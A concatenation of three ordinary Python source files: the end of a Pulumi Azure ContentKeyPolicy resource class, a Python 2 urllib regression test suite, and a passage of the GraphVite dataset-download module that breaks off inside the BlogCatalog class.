content_key_policy_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContentKeyPolicyOptionArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Content Key Policy resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The Media Services account name.
:param pulumi.Input[str] content_key_policy_name: The Content Key Policy name.
:param pulumi.Input[str] description: A description for the Policy.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContentKeyPolicyOptionArgs']]]] options: The Key Policy options.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the Azure subscription.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContentKeyPolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Content Key Policy resource.
:param str resource_name: The name of the resource.
:param ContentKeyPolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContentKeyPolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
content_key_policy_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContentKeyPolicyOptionArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContentKeyPolicyArgs.__new__(ContentKeyPolicyArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["content_key_policy_name"] = content_key_policy_name
__props__.__dict__["description"] = description
if options is None and not opts.urn:
raise TypeError("Missing required property 'options'")
__props__.__dict__["options"] = options
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["created"] = None
__props__.__dict__["last_modified"] = None
__props__.__dict__["name"] = None
__props__.__dict__["policy_id"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:media/v20180701:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20180330preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20180330preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20180601preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20180601preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20200501:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20200501:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20210601:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20210601:ContentKeyPolicy")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ContentKeyPolicy, __self__).__init__(
'azure-native:media/v20180701:ContentKeyPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ContentKeyPolicy':
"""
Get an existing ContentKeyPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ContentKeyPolicyArgs.__new__(ContentKeyPolicyArgs)
__props__.__dict__["created"] = None
__props__.__dict__["description"] = None
__props__.__dict__["last_modified"] = None
__props__.__dict__["name"] = None
__props__.__dict__["options"] = None
__props__.__dict__["policy_id"] = None
__props__.__dict__["type"] = None
return ContentKeyPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def created(self) -> pulumi.Output[str]:
"""
The creation date of the Policy
"""
return pulumi.get(self, "created")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for the Policy.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="lastModified")
def last_modified(self) -> pulumi.Output[str]:
"""
The last modified date of the Policy
"""
return pulumi.get(self, "last_modified")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def options(self) -> pulumi.Output[Sequence['outputs.ContentKeyPolicyOptionResponse']]:
"""
The Key Policy options.
"""
return pulumi.get(self, "options")
@property
@pulumi.getter(name="policyId")
def policy_id(self) -> pulumi.Output[str]:
"""
The legacy Policy ID.
"""
return pulumi.get(self, "policy_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
|
py | 1a32f537038d178cee63fa11fab209ac95c93828 | """Regression tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "__iter__"):
self.assert_(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assert_(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assert_(isinstance(self.returned_obj.info(), mimetools.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a temporary file.
self.text = 'testing urllib.urlretrieve'
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
def tearDown(self):
# Delete the temporary file.
os.remove(test_support.TESTFN)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assert_(isinstance(result[1], mimetools.Message),
"did not get a mimetools.Message instance as second "
"returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
result = urllib.urlretrieve("file:%s" % test_support.TESTFN, second_temp)
self.assertEqual(second_temp, result[0])
self.assert_(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
finally:
FILE.close()
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assert_(isinstance(count, int))
self.assert_(isinstance(block_size, int))
self.assert_(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
urllib.urlretrieve(test_support.TESTFN, second_temp, hooktester)
os.remove(second_temp)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers"), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
result = urllib.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for QuotingTests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assert_(expected in result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assert_(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assert_(expect in result,
"%s not found in %s" % (expect, result))
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
def test_main():
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests
)
if __name__ == '__main__':
test_main()
|
py | 1a32f53a0122b667c478036bf9c2816d821e4c8c | # Copyright 2019 MilaGraph. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Zhaocheng Zhu
"""
Dataset module of GraphVite
Graph
- :class:`BlogCatalog`
- :class:`Youtube`
- :class:`Flickr`
- :class:`Hyperlink2012`
- :class:`Friendster`
- :class:`Wikipedia`
Knowledge Graph
- :class:`Math`
- :class:`FB15k`
- :class:`FB15k237`
- :class:`WN18`
- :class:`WN18RR`
- :class:`Wikidata5m`
- :class:`Freebase`
Visualization
- :class:`MNIST`
- :class:`CIFAR10`
- :class:`ImageNet`
"""
from __future__ import absolute_import, division
import os
import glob
import shutil
import logging
import gzip, zipfile, tarfile
import multiprocessing
from collections import defaultdict
import numpy as np
from . import cfg
logger = logging.getLogger(__name__)
class Dataset(object):
"""
Graph dataset.
Parameters:
name (str): name of dataset
urls (dict, optional): url(s) for each split,
can be either str or list of str
members (dict, optional): zip member(s) for each split,
leave empty for default
Datasets contain several splits, such as train, valid and test.
For each split, there are one or more URLs, specifying the file to download.
You may also specify the zip member to extract.
When a split is accessed, it will be automatically downloaded and decompressed
if it is not present.
You can assign a preprocess for each split, by defining a function with name [split]_preprocess::
class MyDataset(Dataset):
def __init__(self):
super(MyDataset, self).__init__(
"my_dataset",
train="url/to/train/split",
test="url/to/test/split"
)
def train_preprocess(self, input_file, output_file):
with open(input_file, "r") as fin, open(output_file, "w") as fout:
fout.write(fin.read())
f = open(MyDataset().train)
If the preprocess returns a non-trivial value, then it is assigned to the split,
otherwise the file name is assigned.
By convention, only splits ending with ``_data`` have non-trivial return value.
See also:
Pre-defined preprocess functions
:func:`csv2txt`,
:func:`top_k_label`,
:func:`induced_graph`,
:func:`edge_split`,
:func:`link_prediction_split`,
:func:`image_feature_data`
"""
def __init__(self, name, urls=None, members=None):
self.name = name
self.urls = urls or {}
self.members = members or {}
for key in self.urls:
if isinstance(self.urls[key], str):
self.urls[key] = [self.urls[key]]
if key not in self.members:
self.members[key] = [None] * len(self.urls[key])
elif isinstance(self.members[key], str):
self.members[key] = [self.members[key]]
if len(self.urls[key]) != len(self.members[key]):
raise ValueError("Number of members is inconsistent with number of urls in `%s`" % key)
self.path = os.path.join(cfg.dataset_path, self.name)
def relpath(self, path):
return os.path.relpath(path, self.path)
def download(self, url):
from six.moves.urllib.request import urlretrieve
save_file = os.path.basename(url)
if "?" in save_file:
save_file = save_file[:save_file.find("?")]
save_file = os.path.join(self.path, save_file)
if save_file in self.local_files():
return save_file
logger.info("downloading %s to %s" % (url, self.relpath(save_file)))
urlretrieve(url, save_file)
return save_file
def extract(self, zip_file, member=None):
zip_name, extension = os.path.splitext(zip_file)
if zip_name.endswith(".tar"):
extension = ".tar" + extension
zip_name = zip_name[:-4]
if extension == ".txt":
return zip_file
elif member is None:
save_file = zip_name
else:
save_file = os.path.join(os.path.dirname(zip_name), os.path.basename(member))
if save_file in self.local_files():
return save_file
if extension == ".gz":
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with gzip.open(zip_file, "rb") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".tar.gz" or extension == ".tar":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r") as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r").extractfile(member) as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".zip":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file) as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file).open(member, "r") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
else:
raise ValueError("Unknown file extension `%s`" % extension)
return save_file
def get_file(self, key):
file_name = os.path.join(self.path, "%s_%s.txt" % (self.name, key))
if file_name in self.local_files():
return file_name
urls = self.urls[key]
members = self.members[key]
preprocess_name = key + "_preprocess"
preprocess = getattr(self, preprocess_name, None)
if len(urls) > 1 and preprocess is None:
raise AttributeError(
"There is a non-trivial number of files, but function `%s` is not found" % preprocess_name)
extract_files = []
for url, member in zip(urls, members):
download_file = self.download(url)
extract_file = self.extract(download_file, member)
extract_files.append(extract_file)
if preprocess:
result = preprocess(*(extract_files + [file_name]))
if result is not None:
return result
elif os.path.isfile(extract_files[0]):
logger.info("renaming %s to %s" % (self.relpath(extract_files[0]), self.relpath(file_name)))
shutil.move(extract_files[0], file_name)
else:
raise AttributeError(
"There is a non-trivial number of files, but function `%s` is not found" % preprocess_name)
return file_name
def local_files(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
return set(glob.glob(os.path.join(self.path, "*")))
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
if key in self.urls:
return self.get_file(key)
raise AttributeError("Can't resolve split `%s`" % key)
def csv2txt(self, csv_file, txt_file):
"""
Convert ``csv`` to ``txt``.
Parameters:
csv_file: csv file
txt_file: txt file
"""
logger.info("converting %s to %s" % (self.relpath(csv_file), self.relpath(txt_file)))
with open(csv_file, "r") as fin, open(txt_file, "w") as fout:
for line in fin:
fout.write(line.replace(",", "\t"))
def top_k_label(self, label_file, save_file, k, format="node-label"):
"""
Extract top-k labels.
Parameters:
label_file (str): label file
save_file (str): save file
k (int): top-k labels will be extracted
format (str, optional): format of label file,
can be 'node-label' or '(label)-nodes':
- **node-label**: each line is [node] [label]
- **(label)-nodes**: each line is [node]..., no explicit label
"""
logger.info("extracting top-%d labels of %s to %s" % (k, self.relpath(label_file), self.relpath(save_file)))
if format == "node-label":
label2nodes = defaultdict(list)
with open(label_file, "r") as fin:
for line in fin:
node, label = line.split()
label2nodes[label].append(node)
elif format == "(label)-nodes":
label2nodes = {}
with open(label_file, "r") as fin:
for i, line in enumerate(fin):
label2nodes[i] = line.split()
else:
raise ValueError("Unknown file format `%s`" % format)
labels = sorted(label2nodes, key=lambda x: len(label2nodes[x]), reverse=True)[:k]
with open(save_file, "w") as fout:
for label in sorted(labels):
for node in sorted(label2nodes[label]):
fout.write("%s\t%s\n" % (node, label))
def induced_graph(self, graph_file, label_file, save_file):
"""
Induce a subgraph from labeled nodes. Every edge in the induced graph has both endpoints labeled.
Parameters:
graph_file (str): graph file
label_file (str): label file
save_file (str): save file
"""
logger.info("extracting subgraph of %s induced by %s to %s" %
(self.relpath(graph_file), self.relpath(label_file), self.relpath(save_file)))
nodes = set()
with open(label_file, "r") as fin:
for line in fin:
nodes.update(line.split())
with open(graph_file, "r") as fin, open(save_file, "w") as fout:
for line in fin:
if not line.startswith("#"):
u, v = line.split()
if u not in nodes or v not in nodes:
continue
fout.write("%s\t%s\n" % (u, v))
def edge_split(self, graph_file, files, portions):
"""
Divide a graph into several splits.
Parameters:
graph_file (str): graph file
files (list of str): file names
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
with open(graph_file, "r") as fin:
for line in fin:
i = np.searchsorted(portions, np.random.rand())
files[i].write(line)
for file in files:
file.close()
def link_prediction_split(self, graph_file, files, portions):
"""
Divide a normal graph into a train split and several test splits for link prediction use.
Each test split contains half true and half false edges.
Parameters:
graph_file (str): graph file
files (list of str): file names,
the first file is treated as train file
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
nodes = set()
edges = set()
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
num_edges = [0] * len(files)
with open(graph_file, "r") as fin:
for line in fin:
u, v = line.split()[:2]
nodes.update([u, v])
edges.add((u, v))
i = np.searchsorted(portions, np.random.rand())
if i == 0:
files[i].write(line)
else:
files[i].write("%s\t%s\t1\n" % (u, v))
num_edges[i] += 1
nodes = list(nodes)
for file, num_edge in zip(files[1:], num_edges[1:]):
for _ in range(num_edge):
valid = False
while not valid:
u = nodes[int(np.random.rand() * len(nodes))]
v = nodes[int(np.random.rand() * len(nodes))]
valid = u != v and (u, v) not in edges and (v, u) not in edges
file.write("%s\t%s\t0\n" % (u, v))
for file in files:
file.close()
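# Example call (a sketch; file names are hypothetical):
# dataset.link_prediction_split("graph.txt",
#                               ["train.txt", "valid.txt", "test.txt"],
#                               portions=[100, 1, 1])
# train.txt keeps the raw edge lines; valid.txt/test.txt hold "u\tv\t1" for
# held-out true edges and "u\tv\t0" for sampled negatives, in equal numbers.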
def image_feature_data(self, dataset, model="resnet50", batch_size=128):
"""
Compute feature vectors for an image dataset using a neural network.
Parameters:
dataset (torch.utils.data.Dataset): dataset
model (str or torch.nn.Module, optional): pretrained model.
If it is a str, drop the final classification layer of that model and use the last hidden layer's output as the feature.
batch_size (int, optional): batch size
"""
import torch
import torchvision
from torch import nn
logger.info("computing %s feature" % model)
if isinstance(model, str):
full_model = getattr(torchvision.models, model)(pretrained=True)
model = nn.Sequential(*list(full_model.children())[:-1])
num_worker = multiprocessing.cpu_count()
data_loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size, num_workers=num_worker, shuffle=False)
model = model.cuda()
model.eval()
features = []
with torch.no_grad():
for i, (batch_images, batch_labels) in enumerate(data_loader):
if i % 100 == 0:
logger.info("%g%%" % (100.0 * i * batch_size / len(dataset)))
batch_images = batch_images.cuda()
batch_features = model(batch_images).view(batch_images.size(0), -1).cpu().numpy()
features.append(batch_features)
features = np.concatenate(features)
return features
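# Splits are resolved lazily through __getattr__: accessing a split on one of
# the dataset instances created at the bottom of this module downloads,
# extracts and preprocesses the file on first use. A minimal sketch
# (import path assumed):
#
# from graphvite import dataset
# path = dataset.blogcatalog.graph         # triggers download + csv2txt once
# alias = dataset.wikidata5m.alias2entity  # returns a dict, not a file path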
class BlogCatalog(Dataset):
"""
BlogCatalog social network dataset.
Splits:
graph, label, train, test
Train and test splits are used for link prediction purpose.
"""
def __init__(self):
super(BlogCatalog, self).__init__(
"blogcatalog",
urls={
"graph": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"label": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"train": [], # depends on `graph`
"valid": [], # depends on `graph`
"test": [] # depends on `graph`
},
members={
"graph": "BlogCatalog-dataset/data/edges.csv",
"label": "BlogCatalog-dataset/data/group-edges.csv"
}
)
def graph_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def label_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def train_preprocess(self, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def valid_preprocess(self, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
